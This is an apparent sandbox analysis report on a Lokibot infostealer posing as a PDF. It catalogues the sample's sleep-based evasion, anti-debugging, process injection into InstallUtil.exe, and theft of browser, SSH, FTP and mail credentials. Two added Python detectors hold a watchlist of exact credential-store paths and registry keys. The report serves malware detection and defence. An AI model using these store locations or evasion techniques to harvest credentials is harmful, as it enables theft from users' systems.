Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Window / User API: threadDelayed 711
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe TID: 4512; Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe TID: 1764; Thread sleep count: 711 > 30
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe TID: 5080; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5468; Thread sleep time: -1560000s >= -30000s
Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
Queries a list of all running processes
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Process information queried: ProcessInformation
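The sleep signatures above are thresholds applied to per-thread delay events, and the figures repay a closer look: 922337203685477 is Int64.MaxValue / 10000, that is .NET's TimeSpan.MaxValue expressed in milliseconds, so a thread that requests it never wakes, and 3689348814741908 is exactly four such delays. The following is an added example, not code from the report or from Joe Sandbox, that reimplements those heuristics in Python over constructed events whose per-thread totals reproduce the report's numbers. Treating the figures as milliseconds and the split into individual calls are assumptions; the report prints the totals with an 's' suffix and a negative sign.

```python
"""Sleep-based sandbox-evasion heuristics applied to per-thread delay events.

Added example, not part of the Joe Sandbox report. The event list below is
constructed so that per-thread totals match the report; how the totals split
into individual calls is an assumption.
"""
from collections import defaultdict
from dataclasses import dataclass, field

# Int64.MaxValue ticks (100 ns each) in milliseconds: .NET's TimeSpan.MaxValue.
# A Thread.Sleep of this length never returns; it is the 922337203685477 in the report.
DOTNET_MAX_DELAY_MS = (2**63 - 1) // 10_000

LONG_SLEEP_MS = 180_000    # a single call of >= 3 min ("Contains long sleeps")
TOTAL_SLEEP_MS = 30_000    # per-thread total the report compares against 30000
LOOP_CALLS = 30            # per-thread call count the report compares against 30

SAMPLE_EXE = r"C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe"
INSTALLUTIL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"


@dataclass(frozen=True)
class SleepEvent:
    image: str
    tid: int
    delay_ms: int


@dataclass
class Finding:
    image: str
    tid: int
    calls: int
    total_ms: int
    reasons: list = field(default_factory=list)


def analyse(events):
    """Group delays per (image, tid) and apply the heuristics in a fixed order."""
    per_thread = defaultdict(list)
    for ev in events:
        per_thread[(ev.image, ev.tid)].append(ev.delay_ms)

    findings = []
    for (image, tid), delays in sorted(per_thread.items()):
        f = Finding(image, tid, len(delays), sum(delays))
        if any(d >= DOTNET_MAX_DELAY_MS for d in delays):
            f.reasons.append("infinite-sleep")   # TimeSpan.MaxValue: the thread parks forever
        if any(d >= LONG_SLEEP_MS for d in delays):
            f.reasons.append("long-sleep")       # one call outlasts a typical sandbox run
        if f.calls > LOOP_CALLS:
            f.reasons.append("sleep-loop")       # many short sleeps: stalling or polling
        if f.total_ms >= TOTAL_SLEEP_MS:
            f.reasons.append("total-sleep")      # cumulative delay over the threshold
        findings.append(f)
    return findings


def is_evasive(events):
    return any(f.reasons for f in analyse(events))


# Constructed events: per-thread totals match the report's figures.
SAMPLE_EVENTS = (
    [SleepEvent(SAMPLE_EXE, 4512, DOTNET_MAX_DELAY_MS)] * 4   # 4 x MaxValue = 3689348814741908
    + [SleepEvent(SAMPLE_EXE, 1764, 10)] * 711                # 711 short sleeps, total 7110
    + [SleepEvent(SAMPLE_EXE, 5080, DOTNET_MAX_DELAY_MS)]     # one parked thread
    + [SleepEvent(INSTALLUTIL, 5468, 60_000)] * 26            # 26 x 60 s = 1560000 ms
)

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        name = f.image.rsplit("\\", 1)[-1]
        print(f"{name} tid={f.tid} calls={f.calls} total_ms={f.total_ms} reasons={f.reasons}")
```

Thread 1764 trips only the call-count rule (711 calls, but a small total), which is why the report lists it under both the "Window / User" loop signature and the evasive-loop signature; the two parked threads trip every rule.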

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Code function: 0_2_00D9EC58 LdrInitializeThunk,
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,
Enables debug privileges
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
May try to detect the Windows Explorer process (often used for injection)
Source: InstallUtil.exe, 00000003.00000002.1184733969.0000000001360000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
Source: InstallUtil.exe, 00000003.00000002.1184733969.0000000001360000.00000002.00000001.sdmp; Binary or memory string: Progman
Source: InstallUtil.exe, 00000003.00000002.1184733969.0000000001360000.00000002.00000001.sdmp; Binary or memory string: hProgram ManagerWE
Source: InstallUtil.exe, 00000003.00000002.1184733969.0000000001360000.00000002.00000001.sdmp; Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Queries volume information: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Utilities.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v4.0.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\ VolumeInformation
Contains functionality to query the account / user name
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 3_2_00406069 GetUserNameW,
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\EDG95320200205005000471_126_953.pdf.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match; File source: 00000000.00000003.951528258.00000000057E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.1184014650.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.955874046.000000000370B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.955990238.000000000374B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.955936456.0000000003731000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.954718475.00000000026DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: EDG95320200205005000471_126_953.pdf.exe PID: 2428, type: MEMORY
Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 5516, type: MEMORY
Source: Yara match; File source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\pkcs11.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: PopPassword
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: SmtpPassword
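What makes the accesses above a stealer signature is their breadth rather than any one of them: a single process opens Chrome's Login Data, Firefox's key database, KiTTY and WinSCP session keys (Martin Prikryl is WinSCP's author, so HKCU\Software\Martin Prikryl is where WinSCP keeps its configuration), the host lists of several FTP clients and two mail profiles within one run, while a legitimate application reads only its own store. The following added example, not code from the report or from Lokibot, turns that list into a watchlist and flags a process that touches stores from three or more unrelated categories. The targets are copied from the report; PuTTY's HKCU\Software\SimonTatham\PuTTY key, Firefox's logins.json, the benign chrome.exe event and the unrelated kernel32.dll access are assumptions added for coverage.

```python
"""Watchlist of credential stores and a per-process "stealer" verdict.

Added example, not from the report or from Lokibot. Store locations mirror the
artefacts the report shows InstallUtil.exe opening; PuTTY's key, logins.json and
the chrome.exe event are assumptions.
"""
import re
from collections import defaultdict

INSTALLUTIL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"   # constructed benign process

# (category, pattern over the normalised target). Targets are lower-cased and
# HKEY_CURRENT_USER is shortened to hkcu before matching.
CREDENTIAL_STORES = [
    ("browser", re.compile(r"\\google\\chrome\\user data\\[^\\]+\\login data$")),
    ("browser", re.compile(r"\\mozilla\\firefox\\(profiles\.ini$|"
                           r"profiles\\[^\\]+\\(key4\.db|cert9\.db|pkcs11\.txt|logins\.json)$)")),
    ("ssh/scp", re.compile(r"^hkcu\\software\\(9bis\.com\\kitty|simontatham\\putty|martin prikryl)")),
    ("ftp",     re.compile(r"^hkcu\\software\\(far2?\\plugins\\ftp\\hosts|"
                           r"nch software\\classicftp|flashpeak\\blazeftp)")),
    ("mail",    re.compile(r"^hkcu\\software\\(incredimail\\identities|microsoft\\windows nt\\"
                           r"currentversion\\windows messaging subsystem\\profiles)")),
]


def normalise(target):
    return target.strip().lower().replace("hkey_current_user", "hkcu").rstrip("\\")


def classify(target):
    """Return the credential-store category of a file or registry target, or None."""
    t = normalise(target)
    for category, pattern in CREDENTIAL_STORES:
        if pattern.search(t):
            return category
    return None


def stealer_verdict(accesses, min_categories=3):
    """accesses: iterable of (process image, target).

    A process that touches stores of min_categories or more unrelated applications
    is flagged; a browser reading its own Login Data is not.
    """
    per_proc = defaultdict(lambda: {"categories": set(), "hits": []})
    for proc, target in accesses:
        cat = classify(target)
        if cat is not None:
            per_proc[proc]["categories"].add(cat)
            per_proc[proc]["hits"].append((cat, target))
    return {
        proc: {"categories": sorted(v["categories"]),
               "hits": v["hits"],
               "stealer": len(v["categories"]) >= min_categories}
        for proc, v in per_proc.items()
    }


# Targets copied from the report's "Stealing of Sensitive Information" section,
# plus one unrelated file and one constructed benign browser access.
SAMPLE_ACCESSES = [
    (INSTALLUTIL, r"HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions"),
    (INSTALLUTIL, r"HKEY_CURRENT_USER\Software\Martin Prikryl"),
    (INSTALLUTIL, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (INSTALLUTIL, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\6c4zjj0s.default\key4.db"),
    (INSTALLUTIL, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (INSTALLUTIL, r"HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts"),
    (INSTALLUTIL, r"HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts"),
    (INSTALLUTIL, r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    (INSTALLUTIL, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"),
    (INSTALLUTIL, r"C:\Windows\System32\kernel32.dll"),
    (CHROME, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]

if __name__ == "__main__":
    for proc, v in stealer_verdict(SAMPLE_ACCESSES).items():
        print(proc, v["categories"], "STEALER" if v["stealer"] else "ok")
```

Feeding the same function with file-open and registry-open events from an EDR instead of a sandbox report works unchanged; the registry keys are the higher-signal half, since nothing but the owning client has a reason to open a KiTTY or WinSCP session key.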

Malware Configuration

No configs have been found

Behavior Graph

The interactive behavior graph is not reproduced in this export. Its legend distinguishes process, signature, created-file and DNS/IP nodes; marks dropped files, Windows processes, malicious nodes and Internet access; shows the number of created registry values and files; and labels nodes by implementation language (Visual Basic, Delphi, Java, .NET C# or VB.NET, C, C++ or other).